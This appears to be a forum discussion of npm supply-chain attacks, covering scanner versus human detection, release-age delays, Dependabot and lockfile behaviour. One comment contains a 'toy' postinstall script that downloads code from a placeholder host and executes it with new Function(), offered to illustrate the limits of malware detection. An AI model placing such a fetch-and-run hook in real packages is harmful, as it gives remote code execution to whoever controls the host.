The CEO of socket.dev, for example, described an automated pipeline that flags new uploads for analysts, which is good but not instantaneous:
https://www.hackerneue.com/item?id=45257681
The Aikido team also appear to be saying they investigated a suspicious flag (apologies if I’m misreading their post), which again takes time for analysts to work through:
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-com...
My thought was simply that these were caught relatively quickly by security researchers rather than by compromised users reporting breaches. If you didn’t install updates within a relatively short period after they were published, the subsequent response would keep you safe. Obviously that’s not perfect, and a sophisticated, patient attack like the one liblzma suffered would likely still be possible, but there really does seem to be value in having something like Debian’s unstable/stable divide, where researchers and thrill-seekers would get everything ASAP but most people would give it some time to be tested. What I’d really like to see is a community model for funding that, and especially for supporting independent researchers.
I mean I'd prolly be okay paying a yearly fee for access to such a registry.
More seriously, automated scanners seem to do a good job already of finding malicious packages. It's a wonder that npm themselves haven't already deployed an automated countermeasure.
That's not true. This latest incident was detected by an individual researcher, just like many similar attacks in the past. Time and again, it's been individuals who flagged these issues and later reported them to security startups, not automated tools. Don't fall for the PR spin.
If automated scanning were truly effective, we'd see deployments across all major package registries. The reality is, these systems still miss what vigilant humans catch.
So that still seems fine? Presumably researchers are focusing on latest releases, and so their work would not be impacted by other people using this new pnpm option.
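For what it's worth, the delay itself is a one-line config. A minimal sketch, assuming pnpm's minimumReleaseAge setting (the key name and units are from memory, so check the pnpm docs):

    # pnpm-workspace.yaml
    # Refuse to install any version published less than 7 days ago
    # (the value is in minutes).
    minimumReleaseAge: 10080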
No, we wouldn't. Most package registries are run either by bigcorps at a loss or by community maintainers (with bigcorps again sponsoring the infrastructure).
And many of them barely go beyond the "CRUD" of package publishing due to lack of resources. The economic incentives of building up supply chain security tools into the package registries themselves are just not there.
This distinction matters. Malware detection is, in the general case, an undecidable problem (think of the halting problem and Rice's theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies. They can't prove the absence of malicious behavior.
So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just lack of infra or resources.
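To make the undecidability point concrete, here is a toy Node.js sketch (hypothetical URL; an ESM module, so top-level await works). Nothing in it matches a signature, because the payload is just data until it runs; deciding whether the last line is harmless means deciding a semantic property of arbitrary code, which is exactly what Rice's theorem rules out in general:

    // postinstall.mjs -- toy illustration, not real malware
    const res = await fetch("https://example.invalid/payload"); // hypothetical host
    const payload = await res.text();
    // A static scanner sees only fetch + eval-style plumbing here.
    // Whether this is hostile depends entirely on data it never sees.
    new Function(payload)();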
I think this sort of thought process is misguided.
We do see continuous, ecosystem-wide scanning and detection pipelines. For example, GitHub supports Dependabot, which runs supply chain checks.
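For anyone unfamiliar, enabling it is just a small checked-in config; a minimal sketch (double-check the current GitHub docs for the schema):

    # .github/dependabot.yml
    version: 2
    updates:
      - package-ecosystem: "npm"   # watch package.json and the lockfile
        directory: "/"             # where the manifest lives
        schedule:
          interval: "daily"        # how often to check for updates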
What you don't see is magical rabbits being pulled out of top hats. The industry has decades of experience with anti-malware tools in contexts where the malware was never explicitly granted deployment or execution permissions, and yet it deploys and runs anyway. What do you expect when you make code intentionally installable and executable, and capable of making HTTP requests to send and receive any kind of data?
Contrary to what you are implying, this is not a simple problem with straightforward solutions. The security model has relied heavily on gatekeepers, on both the producer and consumer sides. However, the last batch of popular supply chain attacks circumvented the only failsafe in place. Beyond that point, you just have a module that runs unspecified code, like any other module.
> It started with a cryptic build failure in our CI/CD pipeline, which my colleague noticed
> This seemingly minor error was the first sign of a sophisticated supply chain attack. We traced the failure to a small dependency, error-ex. Our package-lock.json specified the stable version 1.3.2 or newer, so it installed the latest version 1.3.3, which got published just a few minutes earlier.
Is that possible? I thought lock files restricted installs to a specific version with an integrity check hash. Is it possible that it would install a newer version which doesn't match the hash in the lock file? Do they just mean package.json here?
> Do they just mean package.json here?
Yes, most likely. A package-lock.json always specifies an exact version with hash and not a "version X or newer".
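For reference, a lockfile entry pins both the exact version and an integrity hash, roughly like this (hash elided):

    "node_modules/error-ex": {
      "version": "1.3.2",
      "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz",
      "integrity": "sha512-..."
    }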
This comes up every time npm install is discussed. Yes, npm install will "ignore" your lockfile and install the latest dependencies it can that satisfy the constraints of your package.json. Yes, you should use npm clean-install. One shortcoming is that the implementation insists on deleting the entire node_modules folder, so package installs can actually take quite a bit of time, even when all the packages are being served from the npm disk cache: https://github.com/npm/cli/issues/564
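In practice the difference looks something like this (a sketch; the 1.3.3 bump is the scenario from the quoted post):

    # package.json contains:  "error-ex": "^1.3.2"

    npm install   # may resolve ^1.3.2 to a freshly published 1.3.3
                  # and rewrite package-lock.json to match
    npm ci        # installs exactly what package-lock.json pins,
                  # verifies integrity hashes, and errors out if the
                  # lockfile and package.json disagree -- but it first
                  # deletes node_modules entirely (see the issue above)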
2) Real chances for owners to notice they have been compromised
3) Adopt early before that commons is fully tragedy-ed.